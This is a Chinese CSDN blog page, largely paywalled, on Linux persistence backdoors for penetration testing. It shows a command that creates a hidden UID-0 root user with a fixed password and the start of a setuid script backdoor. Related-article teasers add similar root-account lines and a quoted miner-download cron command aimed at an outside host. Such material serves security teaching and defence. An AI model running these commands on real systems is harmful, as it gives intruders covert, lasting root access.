Linux持续化后门

最新推荐文章于 2024-08-06 11:16:58 发布
最新推荐文章于 2024-08-06 11:16:58 发布
阅读量3.3k 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/104406505
版权
本文介绍了在Linux环境中维持权限和植入隐蔽后门的方法,包括创建超级用户、使用bash脚本创建远控后门、SSH公钥免密、ICMP后门以及SSH软链接后门。此外,还提到了清除这些后门的策略,如检查启动项、查找未知进程、过滤ICMP包和维护iptables规则。
摘要由CSDN通过智能技术生成

Linux权限维持

环境:Centos7、Kali虚拟机等

 

1、增加超级用户

useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test

通过命令创建了test 123456的超级用户

 

2、unix bash远控后门

先创建/etc/...脚本文件

授予权限chmod +sx /etc/...

修改

最低0.47元/天 解锁文章
小晓晓晓林
关注
专栏目录
Windows持续后门
小晓晓晓林的博客
02-20 2175
Windows权限维持 环境:Win10、Win7、Winxp虚拟机等 0x01 shift后门 windows中有一些辅助功能,能在用户未登录系统之前可以通过组合键来启动它,类似的辅助功能有: C:\Windows\System32\sethc.exe粘滞键,启动快捷键:按五次shift键 C:\Windows\System32\utilman.exe设置中心,启动快捷键:W...
linux 持久后门
luguifang2011的专栏
01-18 3133
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
隔壁王叔的博客
08-06 823
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
持久:利用Linux PAM创建后门
qq_68163788的博客
02-19 1493
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
linux持久
HoAd'blog
08-25 1707
linux持久后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
Unix/Linux上的后门技术和防范
weixin_33860528的博客
05-16 106
对黑客来讲,入侵一个系统只是万里长征的开始,最主要的是长期占有一个肉鸡(傀儡机),所以,后门技术往往非常重要。对于我们来讲,总是处于被动的地位,百密一疏,总有没有做到位的地方,谁都不能保证自己的系统是绝对安全的,所以不能避免我们可能会被入侵。黑客入侵后肯定会留后门,当然,除了那些高手,境界非常高,入侵只是为了测试或者技术挑战,对于一般黑客来讲,入侵之后留个后门是很重要的,我们要防范,当然就...
Linux常见的持久后门汇总1
08-03
Linux常见的持久后门汇总】 在网络安全领域,一旦攻击者成功侵入系统,他们会寻找方法保持对系统的长期访问,这就涉及到了持久后门Linux系统因其开源和广泛使用,成为了攻击者的重要目标。本篇文章主要介绍...
检测Linux下的VFS型内核后门软件.pdf
09-07
这对于提升Linux系统的安全性,防止机密信息泄露和系统被持续控制具有重要意义。 总的来说,面对日益复杂的网络安全威胁,我们需要不断更新和改进检测技术,以应对如VFS型内核后门软件这样的新型攻击。对Linux内核...
linux 系统命令被后门修改_一次Linux系统被攻击的分析过程
weixin_39519619的博客
11-06 779
作者:南非蚂蚁 来源:https://urlify.cn/M7NjIvIT行业发展到现在,安全问题已经变得至关重要,从之前的“棱镜门”事件中,折射出了很多安全问题,信息安全问题已变得刻不容缓,而做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞。下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路...
蚁剑#无后门放心下无后门 放心下
04-01
"无后门放心下"强调了该软件的安全性,意味着它没有内置任何恶意代码,用户可以安心下载和使用。这款工具因其功能强大、操作简便而深受黑客和安全研究人员的喜爱。 蚁剑的主要特点包括: 1. **跨平台支持**:蚁剑...
后门技术和Linux LKM Rootkit详细解析
03-04
在本篇文章里, 我们将看到各种不同的后门技术,特别是Linux的可装载内核模块(LKM)。 我们将会发现LKM后门比传统的后门程序更加复杂,更加强大,更不易于被发现。知道这些之后,我们可以制造我们自己的基于LKM的Rootkit程序,主要体现在TCP/IP层, 因为我们相信这是在系统管理员面前最好的隐藏后门的地方。介绍一下已经存在的后门技术, 然后和LKM技术相比较, 最后讨论我么的LKM程序的设计与实现。
12.3、后渗透测试--持久后门
无痕的博客
12-13 2407
metasploit后渗透测试--持久后门
Linux后门技术及实践
weixin_30918415的博客
10-13 170
 后门简介  入侵者完全控制系统后,为方便下次进入而采用的一种技术。  一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。  常用后门技术   增加超级用户账号   破解/嗅探用户密码   放置SUID Shell   rhosts + +   利用系统服务程序   TCP/UDP/ICMP Shell   Cront...
持久后门crontab
黄都伟
07-06 817
服务器遇到了挖矿程序,wget --quiet http://m247.ltd:36663/.xmrig/0 -O- crontab计划任务导致了该告警的产生。crontab是Linux操作系统中常用的计划任务服务,黑客或恶意程序常常会通过添加修改cron任务使恶意程序定时重复启动,保持驻留。 1.vim /etc/crontab 找到这条命令删除并保存。 2.使用crontab -l 查看,crontab -e进入编辑页面,输入dd,删除, :wq! 保存退出 ...
持久Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1220
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
Linux后门技术零距离接触(转)
cudao7505664的专栏
08-10 79
Linux后门技术零距离接触(转)[@more@]  或许大家还在研究win系统系列的漏洞,比如拿1433端口找一写小小的国内的win肉鸡.当时我在奇怪,你们这样合适吗?自己拿自己国家的机器来攻击入侵不觉得脸红吗?还有最近也就5...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值